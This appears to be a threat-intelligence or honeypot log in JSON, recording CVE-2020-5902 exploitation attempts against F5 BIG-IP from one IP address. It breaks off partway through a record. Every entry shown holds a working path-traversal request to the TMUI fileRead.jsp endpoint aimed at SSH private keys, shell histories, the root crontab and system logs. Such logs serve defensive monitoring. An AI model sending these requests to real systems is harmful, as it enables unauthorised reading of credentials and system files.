internetweather

CVE-2020-5902 activity detected from 85.248.227.163

Jul 9th, 2020
  1. {
  2. "count": 182,
  3. "next": null,
  4. "previous": null,
  5. "results": [
  6. {
  7. "event_id": "c8d956425afd6ae1bdf1d2ad9c2a88afd6fda018c7b4766b637d24c3b260b96a",
  8. "source_ip_address": "85.248.227.163",
  9. "country": "SK",
  10. "user_agent": "python-requests/2.23.0",
  11. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.xsession HTTP/1.1",
  12. "post_data": "",
  13. "target_port": 443,
  14. "protocol": "tcp",
  15. "tags": [
  16. {
  17. "cve": "CVE-2020-5902",
  18. "category": "Platform",
  19. "description": "F5 BIG-IP Configuration Utility RCE"
  20. }
  21. ],
  22. "event_count": 1,
  23. "first_seen": "2020-07-09T08:07:50Z",
  24. "last_seen": "2020-07-09T08:07:50Z"
  25. },
  26. {
  27. "event_id": "e6181a59ae72dfbd8904af37c7f71832d4dc443f42c5be171e4244c0bce1fc43",
  28. "source_ip_address": "85.248.227.163",
  29. "country": "SK",
  30. "user_agent": "python-requests/2.23.0",
  31. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.Xresources HTTP/1.1",
  32. "post_data": "",
  33. "target_port": 443,
  34. "protocol": "tcp",
  35. "tags": [
  36. {
  37. "cve": "CVE-2020-5902",
  38. "category": "Platform",
  39. "description": "F5 BIG-IP Configuration Utility RCE"
  40. }
  41. ],
  42. "event_count": 1,
  43. "first_seen": "2020-07-09T08:07:49Z",
  44. "last_seen": "2020-07-09T08:07:49Z"
  45. },
  46. {
  47. "event_id": "bbab534aa62e2664babea3da25baa2e8185658b5cc8cd45536f7c4db8c6c5930",
  48. "source_ip_address": "85.248.227.163",
  49. "country": "SK",
  50. "user_agent": "python-requests/2.23.0",
  51. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.xinitrc HTTP/1.1",
  52. "post_data": "",
  53. "target_port": 443,
  54. "protocol": "tcp",
  55. "tags": [
  56. {
  57. "cve": "CVE-2020-5902",
  58. "category": "Platform",
  59. "description": "F5 BIG-IP Configuration Utility RCE"
  60. }
  61. ],
  62. "event_count": 1,
  63. "first_seen": "2020-07-09T08:07:47Z",
  64. "last_seen": "2020-07-09T08:07:47Z"
  65. },
  66. {
  67. "event_id": "d3cffd32de67bf847a50a948b46a9a82bed1a6700d57b8b66a9520cb92849e8f",
  68. "source_ip_address": "85.248.227.163",
  69. "country": "SK",
  70. "user_agent": "python-requests/2.23.0",
  71. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.Xdefaults HTTP/1.1",
  72. "post_data": "",
  73. "target_port": 443,
  74. "protocol": "tcp",
  75. "tags": [
  76. {
  77. "cve": "CVE-2020-5902",
  78. "category": "Platform",
  79. "description": "F5 BIG-IP Configuration Utility RCE"
  80. }
  81. ],
  82. "event_count": 1,
  83. "first_seen": "2020-07-09T08:07:46Z",
  84. "last_seen": "2020-07-09T08:07:46Z"
  85. },
  86. {
  87. "event_id": "7e94d9508f67b9d8c08a5f13e8f62f0724921aa39239a1eefa2069df04b2a6e8",
  88. "source_ip_address": "85.248.227.163",
  89. "country": "SK",
  90. "user_agent": "python-requests/2.23.0",
  91. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.wm_style HTTP/1.1",
  92. "post_data": "",
  93. "target_port": 443,
  94. "protocol": "tcp",
  95. "tags": [
  96. {
  97. "cve": "CVE-2020-5902",
  98. "category": "Platform",
  99. "description": "F5 BIG-IP Configuration Utility RCE"
  100. }
  101. ],
  102. "event_count": 1,
  103. "first_seen": "2020-07-09T08:07:44Z",
  104. "last_seen": "2020-07-09T08:07:44Z"
  105. },
  106. {
  107. "event_id": "bcd8a55dbed139192c4484591b63e411c6e9b8b8cddd7083027e2a7bd15da102",
  108. "source_ip_address": "85.248.227.163",
  109. "country": "SK",
  110. "user_agent": "python-requests/2.23.0",
  111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.viminfo HTTP/1.1",
  112. "post_data": "",
  113. "target_port": 443,
  114. "protocol": "tcp",
  115. "tags": [
  116. {
  117. "cve": "CVE-2020-5902",
  118. "category": "Platform",
  119. "description": "F5 BIG-IP Configuration Utility RCE"
  120. }
  121. ],
  122. "event_count": 1,
  123. "first_seen": "2020-07-09T08:07:43Z",
  124. "last_seen": "2020-07-09T08:07:43Z"
  125. },
  126. {
  127. "event_id": "f25cfd80cc556e7c127df87b201ea909af85b7e65e809827de8c62ff72a1901a",
  128. "source_ip_address": "85.248.227.163",
  129. "country": "SK",
  130. "user_agent": "python-requests/2.23.0",
  131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/identity.pub HTTP/1.1",
  132. "post_data": "",
  133. "target_port": 443,
  134. "protocol": "tcp",
  135. "tags": [
  136. {
  137. "cve": "CVE-2020-5902",
  138. "category": "Platform",
  139. "description": "F5 BIG-IP Configuration Utility RCE"
  140. }
  141. ],
  142. "event_count": 1,
  143. "first_seen": "2020-07-09T08:07:41Z",
  144. "last_seen": "2020-07-09T08:07:41Z"
  145. },
  146. {
  147. "event_id": "aeba7fe8646cd0884df9982a77ea7a4a1e82ff9e7d115532fac57c1ecf74db75",
  148. "source_ip_address": "85.248.227.163",
  149. "country": "SK",
  150. "user_agent": "python-requests/2.23.0",
  151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/identity HTTP/1.1",
  152. "post_data": "",
  153. "target_port": 443,
  154. "protocol": "tcp",
  155. "tags": [
  156. {
  157. "cve": "CVE-2020-5902",
  158. "category": "Platform",
  159. "description": "F5 BIG-IP Configuration Utility RCE"
  160. }
  161. ],
  162. "event_count": 1,
  163. "first_seen": "2020-07-09T08:07:40Z",
  164. "last_seen": "2020-07-09T08:07:40Z"
  165. },
  166. {
  167. "event_id": "b0e9ba64bb650260c58945667a49eabdd68222adcda217cf5bc3f40f038ae85b",
  168. "source_ip_address": "85.248.227.163",
  169. "country": "SK",
  170. "user_agent": "python-requests/2.23.0",
  171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_rsa.pub HTTP/1.1",
  172. "post_data": "",
  173. "target_port": 443,
  174. "protocol": "tcp",
  175. "tags": [
  176. {
  177. "cve": "CVE-2020-5902",
  178. "category": "Platform",
  179. "description": "F5 BIG-IP Configuration Utility RCE"
  180. }
  181. ],
  182. "event_count": 1,
  183. "first_seen": "2020-07-09T08:07:38Z",
  184. "last_seen": "2020-07-09T08:07:38Z"
  185. },
  186. {
  187. "event_id": "68d1647f8f886c0c14d1fb3194b221c71e2daaae8ac798f120addad8e73338ef",
  188. "source_ip_address": "85.248.227.163",
  189. "country": "SK",
  190. "user_agent": "python-requests/2.23.0",
  191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_rsa HTTP/1.1",
  192. "post_data": "",
  193. "target_port": 443,
  194. "protocol": "tcp",
  195. "tags": [
  196. {
  197. "cve": "CVE-2020-5902",
  198. "category": "Platform",
  199. "description": "F5 BIG-IP Configuration Utility RCE"
  200. }
  201. ],
  202. "event_count": 1,
  203. "first_seen": "2020-07-09T08:07:37Z",
  204. "last_seen": "2020-07-09T08:07:37Z"
  205. },
  206. {
  207. "event_id": "f464219498bce9ef7c270712f3f38926e6ecd7831d2b4f229b044a5bada1333f",
  208. "source_ip_address": "85.248.227.163",
  209. "country": "SK",
  210. "user_agent": "python-requests/2.23.0",
  211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_dsa.pub HTTP/1.1",
  212. "post_data": "",
  213. "target_port": 443,
  214. "protocol": "tcp",
  215. "tags": [
  216. {
  217. "cve": "CVE-2020-5902",
  218. "category": "Platform",
  219. "description": "F5 BIG-IP Configuration Utility RCE"
  220. }
  221. ],
  222. "event_count": 1,
  223. "first_seen": "2020-07-09T08:07:35Z",
  224. "last_seen": "2020-07-09T08:07:35Z"
  225. },
  226. {
  227. "event_id": "8441001f01d34e6657c6ddedae3c6d5a69beb4427e1dd28a509a67f1566feb01",
  228. "source_ip_address": "85.248.227.163",
  229. "country": "SK",
  230. "user_agent": "python-requests/2.23.0",
  231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_dsa HTTP/1.1",
  232. "post_data": "",
  233. "target_port": 443,
  234. "protocol": "tcp",
  235. "tags": [
  236. {
  237. "cve": "CVE-2020-5902",
  238. "category": "Platform",
  239. "description": "F5 BIG-IP Configuration Utility RCE"
  240. }
  241. ],
  242. "event_count": 1,
  243. "first_seen": "2020-07-09T08:07:34Z",
  244. "last_seen": "2020-07-09T08:07:34Z"
  245. },
  246. {
  247. "event_id": "9b24dfad12f35465e04e5fba6d491b1526236aef53b29d4b2e195cddbfee61c0",
  248. "source_ip_address": "85.248.227.163",
  249. "country": "SK",
  250. "user_agent": "python-requests/2.23.0",
  251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/authorized_keys HTTP/1.1",
  252. "post_data": "",
  253. "target_port": 443,
  254. "protocol": "tcp",
  255. "tags": [
  256. {
  257. "cve": "CVE-2020-5902",
  258. "category": "Platform",
  259. "description": "F5 BIG-IP Configuration Utility RCE"
  260. }
  261. ],
  262. "event_count": 1,
  263. "first_seen": "2020-07-09T08:07:32Z",
  264. "last_seen": "2020-07-09T08:07:32Z"
  265. },
  266. {
  267. "event_id": "64b5a7134eb2323185ab7466e7fe27f3ccea03567f821cb2a8f59e82c7a6408a",
  268. "source_ip_address": "85.248.227.163",
  269. "country": "SK",
  270. "user_agent": "python-requests/2.23.0",
  271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.profile HTTP/1.1",
  272. "post_data": "",
  273. "target_port": 443,
  274. "protocol": "tcp",
  275. "tags": [
  276. {
  277. "cve": "CVE-2020-5902",
  278. "category": "Platform",
  279. "description": "F5 BIG-IP Configuration Utility RCE"
  280. }
  281. ],
  282. "event_count": 1,
  283. "first_seen": "2020-07-09T08:07:31Z",
  284. "last_seen": "2020-07-09T08:07:31Z"
  285. },
  286. {
  287. "event_id": "4b941a42a14fb12bc816a8d1fc328d9a5391e6151e314bfd36713ca1a6f69cbe",
  288. "source_ip_address": "85.248.227.163",
  289. "country": "SK",
  290. "user_agent": "python-requests/2.23.0",
  291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.php_history HTTP/1.1",
  292. "post_data": "",
  293. "target_port": 443,
  294. "protocol": "tcp",
  295. "tags": [
  296. {
  297. "cve": "CVE-2020-5902",
  298. "category": "Platform",
  299. "description": "F5 BIG-IP Configuration Utility RCE"
  300. }
  301. ],
  302. "event_count": 1,
  303. "first_seen": "2020-07-09T08:07:30Z",
  304. "last_seen": "2020-07-09T08:07:30Z"
  305. },
  306. {
  307. "event_id": "fa7de07faf2f4661918e995bcec1a465191267fecab98d2f54702c583165b14f",
  308. "source_ip_address": "85.248.227.163",
  309. "country": "SK",
  310. "user_agent": "python-requests/2.23.0",
  311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.nano_history HTTP/1.1",
  312. "post_data": "",
  313. "target_port": 443,
  314. "protocol": "tcp",
  315. "tags": [
  316. {
  317. "cve": "CVE-2020-5902",
  318. "category": "Platform",
  319. "description": "F5 BIG-IP Configuration Utility RCE"
  320. }
  321. ],
  322. "event_count": 1,
  323. "first_seen": "2020-07-09T08:07:28Z",
  324. "last_seen": "2020-07-09T08:07:28Z"
  325. },
  326. {
  327. "event_id": "1ea12d1cfdad717baff44e9c5efbeed148a0a96d958c36f6fb667ea8030afb89",
  328. "source_ip_address": "85.248.227.163",
  329. "country": "SK",
  330. "user_agent": "python-requests/2.23.0",
  331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.mysql_history HTTP/1.1",
  332. "post_data": "",
  333. "target_port": 443,
  334. "protocol": "tcp",
  335. "tags": [
  336. {
  337. "cve": "CVE-2020-5902",
  338. "category": "Platform",
  339. "description": "F5 BIG-IP Configuration Utility RCE"
  340. }
  341. ],
  342. "event_count": 1,
  343. "first_seen": "2020-07-09T08:07:27Z",
  344. "last_seen": "2020-07-09T08:07:27Z"
  345. },
  346. {
  347. "event_id": "d4f7f83a38220e31ac03ee9591b45272cf32e50be47fb54db398830172ca9440",
  348. "source_ip_address": "85.248.227.163",
  349. "country": "SK",
  350. "user_agent": "python-requests/2.23.0",
  351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.logout HTTP/1.1",
  352. "post_data": "",
  353. "target_port": 443,
  354. "protocol": "tcp",
  355. "tags": [
  356. {
  357. "cve": "CVE-2020-5902",
  358. "category": "Platform",
  359. "description": "F5 BIG-IP Configuration Utility RCE"
  360. }
  361. ],
  362. "event_count": 1,
  363. "first_seen": "2020-07-09T08:07:25Z",
  364. "last_seen": "2020-07-09T08:07:25Z"
  365. },
  366. {
  367. "event_id": "5620fecf29b26fea05a230d018f8f8d7df6e2063d98d6b1955d400212bd28907",
  368. "source_ip_address": "85.248.227.163",
  369. "country": "SK",
  370. "user_agent": "python-requests/2.23.0",
  371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.login HTTP/1.1",
  372. "post_data": "",
  373. "target_port": 443,
  374. "protocol": "tcp",
  375. "tags": [
  376. {
  377. "cve": "CVE-2020-5902",
  378. "category": "Platform",
  379. "description": "F5 BIG-IP Configuration Utility RCE"
  380. }
  381. ],
  382. "event_count": 1,
  383. "first_seen": "2020-07-09T08:07:24Z",
  384. "last_seen": "2020-07-09T08:07:24Z"
  385. },
  386. {
  387. "event_id": "50cfb5b80e5d6c7385437a75066282adebf74cdbc3e3b06d76974996ea0b34eb",
  388. "source_ip_address": "85.248.227.163",
  389. "country": "SK",
  390. "user_agent": "python-requests/2.23.0",
  391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.gtkrc HTTP/1.1",
  392. "post_data": "",
  393. "target_port": 443,
  394. "protocol": "tcp",
  395. "tags": [
  396. {
  397. "cve": "CVE-2020-5902",
  398. "category": "Platform",
  399. "description": "F5 BIG-IP Configuration Utility RCE"
  400. }
  401. ],
  402. "event_count": 1,
  403. "first_seen": "2020-07-09T08:07:22Z",
  404. "last_seen": "2020-07-09T08:07:22Z"
  405. },
  406. {
  407. "event_id": "b4a9c796e4b0695057c2e514874f57d7b542ade1f95f0d3300822156ba670b76",
  408. "source_ip_address": "85.248.227.163",
  409. "country": "SK",
  410. "user_agent": "python-requests/2.23.0",
  411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bashrc HTTP/1.1",
  412. "post_data": "",
  413. "target_port": 443,
  414. "protocol": "tcp",
  415. "tags": [
  416. {
  417. "cve": "CVE-2020-5902",
  418. "category": "Platform",
  419. "description": "F5 BIG-IP Configuration Utility RCE"
  420. }
  421. ],
  422. "event_count": 1,
  423. "first_seen": "2020-07-09T08:07:21Z",
  424. "last_seen": "2020-07-09T08:07:21Z"
  425. },
  426. {
  427. "event_id": "390940616c39863bdc9aff064cad70e526a9b829b2866ec392a365c6bd1495fa",
  428. "source_ip_address": "85.248.227.163",
  429. "country": "SK",
  430. "user_agent": "python-requests/2.23.0",
  431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_profile HTTP/1.1",
  432. "post_data": "",
  433. "target_port": 443,
  434. "protocol": "tcp",
  435. "tags": [
  436. {
  437. "cve": "CVE-2020-5902",
  438. "category": "Platform",
  439. "description": "F5 BIG-IP Configuration Utility RCE"
  440. }
  441. ],
  442. "event_count": 1,
  443. "first_seen": "2020-07-09T08:07:19Z",
  444. "last_seen": "2020-07-09T08:07:19Z"
  445. },
  446. {
  447. "event_id": "5330acdc02835be01f5283457b3e21da32d968eec38815a1c2b6d29f0c3c863a",
  448. "source_ip_address": "85.248.227.163",
  449. "country": "SK",
  450. "user_agent": "python-requests/2.23.0",
  451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_logout HTTP/1.1",
  452. "post_data": "",
  453. "target_port": 443,
  454. "protocol": "tcp",
  455. "tags": [
  456. {
  457. "cve": "CVE-2020-5902",
  458. "category": "Platform",
  459. "description": "F5 BIG-IP Configuration Utility RCE"
  460. }
  461. ],
  462. "event_count": 1,
  463. "first_seen": "2020-07-09T08:07:18Z",
  464. "last_seen": "2020-07-09T08:07:18Z"
  465. },
  466. {
  467. "event_id": "efd7473faefc27c61012347a98effa91357de61f38616476cb017950852d8f10",
  468. "source_ip_address": "85.248.227.163",
  469. "country": "SK",
  470. "user_agent": "python-requests/2.23.0",
  471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_history HTTP/1.1",
  472. "post_data": "",
  473. "target_port": 443,
  474. "protocol": "tcp",
  475. "tags": [
  476. {
  477. "cve": "CVE-2020-5902",
  478. "category": "Platform",
  479. "description": "F5 BIG-IP Configuration Utility RCE"
  480. }
  481. ],
  482. "event_count": 1,
  483. "first_seen": "2020-07-09T08:07:17Z",
  484. "last_seen": "2020-07-09T08:07:17Z"
  485. },
  486. {
  487. "event_id": "e8aa230be6714f7ef155d47ae7cdd7b019b89cf6d6f1600505cac6b78e5e6915",
  488. "source_ip_address": "85.248.227.163",
  489. "country": "SK",
  490. "user_agent": "python-requests/2.23.0",
  491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.atfp_history HTTP/1.1",
  492. "post_data": "",
  493. "target_port": 443,
  494. "protocol": "tcp",
  495. "tags": [
  496. {
  497. "cve": "CVE-2020-5902",
  498. "category": "Platform",
  499. "description": "F5 BIG-IP Configuration Utility RCE"
  500. }
  501. ],
  502. "event_count": 1,
  503. "first_seen": "2020-07-09T08:07:15Z",
  504. "last_seen": "2020-07-09T08:07:15Z"
  505. },
  506. {
  507. "event_id": "90bd0f3a6db72491bda9daa741c8dca27cadbdc9e7bc4da1cce71805e0e1a1a7",
  508. "source_ip_address": "85.248.227.163",
  509. "country": "SK",
  510. "user_agent": "python-requests/2.23.0",
  511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/error.log HTTP/1.1",
  512. "post_data": "",
  513. "target_port": 443,
  514. "protocol": "tcp",
  515. "tags": [
  516. {
  517. "cve": "CVE-2020-5902",
  518. "category": "Platform",
  519. "description": "F5 BIG-IP Configuration Utility RCE"
  520. }
  521. ],
  522. "event_count": 1,
  523. "first_seen": "2020-07-09T08:07:14Z",
  524. "last_seen": "2020-07-09T08:07:14Z"
  525. },
  526. {
  527. "event_id": "2c043e5840b75ad4573196c83e2f425c93ee6b10299b1ce26e60b8f665281c6f",
  528. "source_ip_address": "85.248.227.163",
  529. "country": "SK",
  530. "user_agent": "python-requests/2.23.0",
  531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/access.log HTTP/1.1",
  532. "post_data": "",
  533. "target_port": 443,
  534. "protocol": "tcp",
  535. "tags": [
  536. {
  537. "cve": "CVE-2020-5902",
  538. "category": "Platform",
  539. "description": "F5 BIG-IP Configuration Utility RCE"
  540. }
  541. ],
  542. "event_count": 1,
  543. "first_seen": "2020-07-09T08:07:12Z",
  544. "last_seen": "2020-07-09T08:07:12Z"
  545. },
  546. {
  547. "event_id": "81f67cd61a9ff76e5ff54b222f62b1a0570174852553d207a10bfb954d8ec066",
  548. "source_ip_address": "85.248.227.163",
  549. "country": "SK",
  550. "user_agent": "python-requests/2.23.0",
  551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/error_log HTTP/1.1",
  552. "post_data": "",
  553. "target_port": 443,
  554. "protocol": "tcp",
  555. "tags": [
  556. {
  557. "cve": "CVE-2020-5902",
  558. "category": "Platform",
  559. "description": "F5 BIG-IP Configuration Utility RCE"
  560. }
  561. ],
  562. "event_count": 1,
  563. "first_seen": "2020-07-09T08:07:11Z",
  564. "last_seen": "2020-07-09T08:07:11Z"
  565. },
  566. {
  567. "event_id": "3da3ad19087bc07f49743458b7b91e3103ae715af90cb126c8628f6dbf1ed67d",
  568. "source_ip_address": "85.248.227.163",
  569. "country": "SK",
  570. "user_agent": "python-requests/2.23.0",
  571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/access_log HTTP/1.1",
  572. "post_data": "",
  573. "target_port": 443,
  574. "protocol": "tcp",
  575. "tags": [
  576. {
  577. "cve": "CVE-2020-5902",
  578. "category": "Platform",
  579. "description": "F5 BIG-IP Configuration Utility RCE"
  580. }
  581. ],
  582. "event_count": 1,
  583. "first_seen": "2020-07-09T08:07:09Z",
  584. "last_seen": "2020-07-09T08:07:09Z"
  585. },
  586. {
  587. "event_id": "6feac103cb26a6fddd24bf58a461e90f1ed5972745d582f9fc61f0280606817e",
  588. "source_ip_address": "85.248.227.163",
  589. "country": "SK",
  590. "user_agent": "python-requests/2.23.0",
  591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/log/error_log HTTP/1.1",
  592. "post_data": "",
  593. "target_port": 443,
  594. "protocol": "tcp",
  595. "tags": [
  596. {
  597. "cve": "CVE-2020-5902",
  598. "category": "Platform",
  599. "description": "F5 BIG-IP Configuration Utility RCE"
  600. }
  601. ],
  602. "event_count": 1,
  603. "first_seen": "2020-07-09T08:07:08Z",
  604. "last_seen": "2020-07-09T08:07:08Z"
  605. },
  606. {
  607. "event_id": "90cd2cf5b7551a91d9d243193c132f6a2a7e256fb524ca24ebc7edb0e0cc68bd",
  608. "source_ip_address": "85.248.227.163",
  609. "country": "SK",
  610. "user_agent": "python-requests/2.23.0",
  611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/log/access_log HTTP/1.1",
  612. "post_data": "",
  613. "target_port": 443,
  614. "protocol": "tcp",
  615. "tags": [
  616. {
  617. "cve": "CVE-2020-5902",
  618. "category": "Platform",
  619. "description": "F5 BIG-IP Configuration Utility RCE"
  620. }
  621. ],
  622. "event_count": 1,
  623. "first_seen": "2020-07-09T08:07:06Z",
  624. "last_seen": "2020-07-09T08:07:06Z"
  625. },
  626. {
  627. "event_id": "756823160aa9f97c70eba80d3e2dc0cdbbd508928c3ba5ff1c18033082fe9420",
  628. "source_ip_address": "85.248.227.163",
  629. "country": "SK",
  630. "user_agent": "python-requests/2.23.0",
  631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/webmin/miniserv.log HTTP/1.1",
  632. "post_data": "",
  633. "target_port": 443,
  634. "protocol": "tcp",
  635. "tags": [
  636. {
  637. "cve": "CVE-2020-5902",
  638. "category": "Platform",
  639. "description": "F5 BIG-IP Configuration Utility RCE"
  640. }
  641. ],
  642. "event_count": 1,
  643. "first_seen": "2020-07-09T08:07:05Z",
  644. "last_seen": "2020-07-09T08:07:05Z"
  645. },
  646. {
  647. "event_id": "6875f4192ce0a4ed70bde7984da3b66a872f8d031431533d3e09979b23c752d3",
  648. "source_ip_address": "85.248.227.163",
  649. "country": "SK",
  650. "user_agent": "python-requests/2.23.0",
  651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/spool/cron/crontabs/root HTTP/1.1",
  652. "post_data": "",
  653. "target_port": 443,
  654. "protocol": "tcp",
  655. "tags": [
  656. {
  657. "cve": "CVE-2020-5902",
  658. "category": "Platform",
  659. "description": "F5 BIG-IP Configuration Utility RCE"
  660. }
  661. ],
  662. "event_count": 1,
  663. "first_seen": "2020-07-09T08:07:04Z",
  664. "last_seen": "2020-07-09T08:07:04Z"
  665. },
  666. {
  667. "event_id": "93d7f13280678a681f945a5752940381db1685a70a2d0c8c1a46b5625a49d4ec",
  668. "source_ip_address": "85.248.227.163",
  669. "country": "SK",
  670. "user_agent": "python-requests/2.23.0",
  671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/run/utmp HTTP/1.1",
  672. "post_data": "",
  673. "target_port": 443,
  674. "protocol": "tcp",
  675. "tags": [
  676. {
  677. "cve": "CVE-2020-5902",
  678. "category": "Platform",
  679. "description": "F5 BIG-IP Configuration Utility RCE"
  680. }
  681. ],
  682. "event_count": 1,
  683. "first_seen": "2020-07-09T08:07:02Z",
  684. "last_seen": "2020-07-09T08:07:02Z"
  685. },
  686. {
  687. "event_id": "030f14dbbf28c3112a8b29cf1ae323099a0cc48bf520878ad309712c70c5c60b",
  688. "source_ip_address": "85.248.227.163",
  689. "country": "SK",
  690. "user_agent": "python-requests/2.23.0",
  691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/mysql.log HTTP/1.1",
  692. "post_data": "",
  693. "target_port": 443,
  694. "protocol": "tcp",
  695. "tags": [
  696. {
  697. "cve": "CVE-2020-5902",
  698. "category": "Platform",
  699. "description": "F5 BIG-IP Configuration Utility RCE"
  700. }
  701. ],
  702. "event_count": 1,
  703. "first_seen": "2020-07-09T08:07:01Z",
  704. "last_seen": "2020-07-09T08:07:01Z"
  705. },
  706. {
  707. "event_id": "5093d72412b90f07f6b72639605146d12c6eb03df42ea9038e2a082c03cf3df4",
  708. "source_ip_address": "85.248.227.163",
  709. "country": "SK",
  710. "user_agent": "python-requests/2.23.0",
  711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/yum.log HTTP/1.1",
  712. "post_data": "",
  713. "target_port": 443,
  714. "protocol": "tcp",
  715. "tags": [
  716. {
  717. "cve": "CVE-2020-5902",
  718. "category": "Platform",
  719. "description": "F5 BIG-IP Configuration Utility RCE"
  720. }
  721. ],
  722. "event_count": 1,
  723. "first_seen": "2020-07-09T08:06:59Z",
  724. "last_seen": "2020-07-09T08:06:59Z"
  725. },
  726. {
  727. "event_id": "515496b762cf1bb2cb54e28b47e7e96cdb8fcc77d382b19dcd6cf73e28a6892d",
  728. "source_ip_address": "85.248.227.163",
  729. "country": "SK",
  730. "user_agent": "python-requests/2.23.0",
  731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/xferlog HTTP/1.1",
  732. "post_data": "",
  733. "target_port": 443,
  734. "protocol": "tcp",
  735. "tags": [
  736. {
  737. "cve": "CVE-2020-5902",
  738. "category": "Platform",
  739. "description": "F5 BIG-IP Configuration Utility RCE"
  740. }
  741. ],
  742. "event_count": 1,
  743. "first_seen": "2020-07-09T08:06:58Z",
  744. "last_seen": "2020-07-09T08:06:58Z"
  745. },
  746. {
  747. "event_id": "9585fdeb1fc09d44e2206caf2306aedb6909bfc898e0634ee7cb65e87447ed6a",
  748. "source_ip_address": "85.248.227.163",
  749. "country": "SK",
  750. "user_agent": "python-requests/2.23.0",
  751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/wtmp HTTP/1.1",
  752. "post_data": "",
  753. "target_port": 443,
  754. "protocol": "tcp",
  755. "tags": [
  756. {
  757. "cve": "CVE-2020-5902",
  758. "category": "Platform",
  759. "description": "F5 BIG-IP Configuration Utility RCE"
  760. }
  761. ],
  762. "event_count": 1,
  763. "first_seen": "2020-07-09T08:06:57Z",
  764. "last_seen": "2020-07-09T08:06:57Z"
  765. },
  766. {
  767. "event_id": "3df5a0c5a767f8bfcd1e25a85fcd2707dd236fb6c8958aba14b8a3cc427d608b",
  768. "source_ip_address": "85.248.227.163",
  769. "country": "SK",
  770. "user_agent": "python-requests/2.23.0",
  771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/vsftpd.log HTTP/1.1",
  772. "post_data": "",
  773. "target_port": 443,
  774. "protocol": "tcp",
  775. "tags": [
  776. {
  777. "cve": "CVE-2020-5902",
  778. "category": "Platform",
  779. "description": "F5 BIG-IP Configuration Utility RCE"
  780. }
  781. ],
  782. "event_count": 1,
  783. "first_seen": "2020-07-09T08:06:55Z",
  784. "last_seen": "2020-07-09T08:06:55Z"
  785. },
  786. {
  787. "event_id": "3c0b687fa4448462a72d4fba85f9e60d4b8816f23f99c5c0dc60a4d7c9b15708",
  788. "source_ip_address": "85.248.227.163",
  789. "country": "SK",
  790. "user_agent": "python-requests/2.23.0",
  791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/secure HTTP/1.1",
  792. "post_data": "",
  793. "target_port": 443,
  794. "protocol": "tcp",
  795. "tags": [
  796. {
  797. "cve": "CVE-2020-5902",
  798. "category": "Platform",
  799. "description": "F5 BIG-IP Configuration Utility RCE"
  800. }
  801. ],
  802. "event_count": 1,
  803. "first_seen": "2020-07-09T08:06:54Z",
  804. "last_seen": "2020-07-09T08:06:54Z"
  805. },
  806. {
  807. "event_id": "4f53f92e0f4bca5f371c295be076c5fd70aa671054d46162c080a17c566e0cf9",
  808. "source_ip_address": "85.248.227.163",
  809. "country": "SK",
